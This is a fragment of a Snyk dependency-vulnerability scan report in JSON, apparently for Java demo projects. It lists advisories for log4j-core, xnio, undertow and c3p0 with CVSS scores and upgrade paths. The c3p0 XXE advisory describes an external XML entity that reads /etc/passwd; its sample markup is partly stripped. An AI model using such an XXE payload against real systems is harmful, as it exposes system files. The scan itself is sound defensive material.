"https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.17.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.15.0" + }, + { + "id": "SNYK-JAVA-ORGJBOSSXNIO-2994360", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.8.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.8.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.jboss.xnio:xnio-api", + "references": [ + { + "url": "https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/xnio/xnio/pull/291", + "title": "GitHub PR" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064226", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-27T13:34:34.076065Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:50.426700Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:00.412483Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-27T13:34:34.076065Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:50.426700Z" + } + ], + "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the `notifyReadClosed` method by allowing an attacker to send flawed requests to a server, possibly causing log contention-related performance concerns or an unwanted disk fill-up.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.8 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12)\n- [GitHub PR](https://github.com/xnio/xnio/pull/291)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2064226)\n", + "epssDetails": { + "percentile": "0.53436", + "probability": "0.00164", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-0084" + ], + "CWE": [ + "CWE-770" + ], + "GHSA": [ + "GHSA-76fg-mhrg-fmmg" + ] + }, + "packageName": "org.jboss.xnio:xnio-api", + "proprietary": false, + "creationTime": "2022-08-28T06:46:31.563692Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-08-28T06:35:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.jboss.xnio", + "artifactId": "xnio-api" + }, + "publicationTime": "2022-08-28T09:48:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-27T13:34:34.076065Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final", + "org.jboss.xnio:xnio-api@3.8.16.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.jboss.xnio:xnio-api", + "version": "3.8.4.Final" + }, + { + "id": "SNYK-JAVA-ORGJBOSSXNIO-6403375", + "title": "Uncontrolled Resource Consumption", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,3.8.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.8.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.jboss.xnio:xnio-api", + "references": [ + { + "url": "https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241822", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-27T13:45:18.043553Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-24T07:16:49.813145Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-27T13:45:18.043553Z" + } + ], + "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption due to the `NotifierState` function that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large, leading to a possible denial of service.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.14 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2241822)\n", + "epssDetails": { + "percentile": "0.10602", + "probability": "0.00044", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-5685" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.jboss.xnio:xnio-api", + "proprietary": false, + "creationTime": "2024-03-06T14:54:57.557703Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-03-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.jboss.xnio", + "artifactId": "xnio-api" + }, + "publicationTime": "2024-03-07T06:05:43.052310Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-27T13:45:18.043553Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final", + "org.jboss.xnio:xnio-api@3.8.16.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.jboss.xnio:xnio-api", + "version": "3.8.4.Final" + } + ], + "ok": false, + "dependencyCount": 12, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "21 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-IOUNDERTOW-7433721", + "title": "Memory Leak", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 2.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/errata/RHSA-2024:4392", + "title": "Red Hat Security Advisory" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 2.3, + "cvssVersion": "4.0", + "modificationTime": "2024-07-10T14:39:24.891744Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-10T14:39:24.891744Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", + "epssDetails": { + "percentile": "0.16001", + "probability": "0.00045", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-3653" + ], + "CWE": [ + "CWE-401" + ], + "GHSA": [ + "GHSA-ch7q-gpff-h9hp" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-07-10T07:43:42.505449Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-07-09T00:31:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-07-10T14:39:24.891304Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-10T14:39:24.891744Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final", + "severityWithCritical": "low" + } + ], + "upgrade": { + "com.unboundid:unboundid-ldapsdk@3.1.1": { + "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5", + "upgrades": [ + "com.unboundid:unboundid-ldapsdk@3.1.1" + ], + "vulns": [ + "SNYK-JAVA-COMUNBOUNDID-32143" + ] + }, + "commons-collections:commons-collections@3.1": { + "upgradeTo": "commons-collections:commons-collections@3.2.2", + "upgrades": [ + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1", + "commons-collections:commons-collections@3.1" + ], + "vulns": [ + "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" + ] + }, + "io.undertow:undertow-core@2.2.13.Final": { + "upgradeTo": "io.undertow:undertow-core@2.3.8.Final", + "upgrades": [ + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final", + "org.jboss.xnio:xnio-api@3.8.4.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final", + "io.undertow:undertow-core@2.2.13.Final" + ], + "vulns": [ + "SNYK-JAVA-IOUNDERTOW-7433720", + "SNYK-JAVA-IOUNDERTOW-7300152", + "SNYK-JAVA-IOUNDERTOW-7300153", + "SNYK-JAVA-IOUNDERTOW-7361775", + "SNYK-JAVA-ORGJBOSSXNIO-2994360", + "SNYK-JAVA-ORGJBOSSXNIO-6403375", + "SNYK-JAVA-IOUNDERTOW-6567186", + "SNYK-JAVA-IOUNDERTOW-6669948", + "SNYK-JAVA-IOUNDERTOW-3358786", + "SNYK-JAVA-IOUNDERTOW-3339519", + "SNYK-JAVA-IOUNDERTOW-2871356", + "SNYK-JAVA-IOUNDERTOW-3012383", + "SNYK-JAVA-IOUNDERTOW-2391283" + ] + }, + "org.apache.logging.log4j:log4j-core@2.15.0": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.15.0", + "org.apache.logging.log4j:log4j-core@2.15.0", + "org.apache.logging.log4j:log4j-core@2.15.0" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 21, + "projectName": "io.snyk:log4shell-server", + "foundProjectCount": 7, + "displayTargetFile": "log4shell-goof/log4shell-server/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [], + "ok": true, + "dependencyCount": 3, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "No known vulnerabilities", + "filesystemPolicy": false, + "uniqueCount": 0, + "projectName": "io.github.snyk:todolist-mvc", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 